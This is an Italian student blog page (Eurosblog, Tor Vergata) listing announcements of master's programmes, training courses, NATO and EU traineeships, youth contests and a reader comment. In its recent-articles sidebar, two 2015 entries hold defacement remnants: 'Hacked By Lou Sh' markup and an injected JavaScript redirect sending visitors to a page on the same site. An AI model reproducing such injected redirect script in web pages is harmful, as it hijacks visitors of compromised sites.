EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Master

Master


Master

it

La SPICeS, Scuola di Politica Internazionale - Cooperazione e Sviluppo nata nel 1991, è sostenuta da Volontari nel mondo-FOCSIV, la più grande federazione di Organizzazione Non Governativa in Italia, in collaborazione con CARITAS Italiana ed U.C.S.E.I., l’Ufficio Centrale degli Studenti Esteri in Italia, e con il patrocinio della Pontificia Università Gregoriana. Alla sua XXII edizione, propone un metodo multidisciplinare che riguarda le complesse tematiche della cooperazione nelle aree del diritto internazionale, dell’economia e delle relazioni internazionali. Il piano formativo ha come obiettivo quello di far recepire la conoscenza di fondamentali strumenti operativi, costruendo moduli specialistici sul ciclo del progetto, sulla tutela dei diritti umani e sulla gestione dei conflitti.

Come si articola il corso

Il corso ha durata annuale. Nel caso della città di Roma si articola in 180 ore di lezione frontale, gruppi di lavoro sul ciclo del progetto e la possibilità di effettuare stage in Italia e all’estero che va dai 3 ai 6 mesi. I giorni in cui saranno svolte le lezioni sono (...)

it

Farefuturo continua a credere nei giovani qualificati e nella necessità di far crescere una nuova classe dirigente per un’Italia migliore.

Per questo sta organizzando tre corsi di formazione: in giornalismo e comunicazione politica al tempo dei nuovi media; in tecniche legislative e strategie di comunicazione per assistenti e consulenti parlamentari; in storia e fondamenti del Popolarismo europeo. I percorsi didattici, ai quali (...)

it

Sono aperte le iscrizioni per la decima edizione del Master che vi permetterà di diventare i futuri dirigenti e professionisti nel mercato della comunicazione e dei media

Vi segnaliamo l’apertura delle iscrizioni per il Master che vi permetterà di diventare i futuri dirigenti e professionisti nel mercato della comunicazione e dei media. Stiamo parlando del “ Master in Economia e Gestione della Comunicazione e dei Media ”, giunto oramai alla sua decima edizione, (...)

it

AGRIstartup è un concorso per i giovani che hanno un’idea imprenditoriale da realizzare in campo agricolo, agroalimentari e agro energetico.

Agriventure (Gruppo Intesa San Paolo) presenta la prima edizione di AGRIstartup un concorso per promuovere lo sviluppo economico del territorio nazionale. Il concorso è dedicato ai giovani di una età compresa tra i 18 e i 28 anni che non siano già soci di aziende o imprenditori agricoli titolari. (...)

21
05
2011

Eur@dionantes

it

Sulla frequenza 101.3 di Nantes è possibile ascoltare eur@dio Nantes la radio rivolta soprattutto ai giovani e finanziata dall’Unione Europea.

Il progetto di questa radio nasce nel 2005 quando la giornalista francese Laurence Aubron che gia collaborava con molti studenti stranieri si rende conto (...)

it

"Fare della differenza linguistica un punto di forza" ecco con quale spirito nasce il riconoscimento Label organizzato dalla Commissione dell'Unione Europea e ormai giunto alla sua quattordicesima edizione.

Sono ormai lontani gli anni in cui uno dei principali obiettivi dei singoli stati era quello di proteggere e tutelare la propria lingua, in cui si credeva che un idioma potesse essere migliore di un altro. Oggi la situazione si è decisamente evoluta: basta pensare che uno dei principali (...)

it

Scricate le puntata del 16 maggio dal banner presente sul nostro sito oppure collegandovi al indirizzo: http://radio.torvergata.it/multimed...

Napolitano critica l’Unione Europea. Il presidente della Repubblica ha espresso una critica sull’Unione Europea, giudicandola insufficiente in politica internazionale. Il riferimento sarebbe alle risposte date dall’Unione in merito alle crisi del Mediterraneo e all’emergenza immigrazione. L’Alto (...)

it

La ricerca di un posto di lavoro di prestigio si avvicina alla fine per i 40 giovani che avranno la possibilità di usufruire di questo programma di tirocini organizzato dal quartier generale della NATO. Gli interessati però devono affrettarsi, la possibilità di inviare la propria candidatura scade il 20 maggio 2011 ed è da inviare online agli uffici della NATO a Bruxelles.

Parte per la nona volta l’ormai consueto programma di tirocini negli uffici della NATO di Bruxelles volto ai giovani laureandi e neo laureati appartenenti ai paesi della NATO che volessero lavorare con l’organizzazione internazionale. Il programma prevede il raggiungimento di quattro obiettivi (...)

it

Creato nel 1995, il programma di cooperazione nell’istruzione superiore, la formazione e la gioventù, ha come obiettivo di avvicinare gli studenti dell’UE a quelli canadesi tramite progetti accademici comuni nell’istruzione superiore e nella formazione professionale. La base di partenza per gli istituti d’istruzione superiore che volessero beneficiare di una tale sovvenzione è costituita dall’appartenere a uno dei 27 paesi dell’UE e dalla presentazione di un valido progetto.

Il Canada non sarà più così lontano. O almeno non lo sarà per gli studenti degli istituti che riusciranno ad avvalersi del programma di cooperazione nell’istruzione superiore o di formazione tra UE e Canada.

Per partecipare al suddetto programma, ogni progetto deve avere un istituto capofila (...)

it

Quest'anno sono state molte le iniziative che l'Unione Europea ha attuato per cercare di offrire nuove occasioni e agevolazioni formative per i giovani studenti. Dopo il programma Recity, i programmi di Erasmus Mundus con i relativi master, e le borse di studio messe a disposizione per ognuna di queste attività arrivano i tirocini per traduttori.

Tutti coloro che sono in possesso di un diploma universitario possono provare a fare domanda per partecipare al tirocinio. L’Unione Europea ha messo a disposizione questa bella occasione per dare possibilità ai giovani di incrementare il proprio curriculum formativo e professionale. Inoltre (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France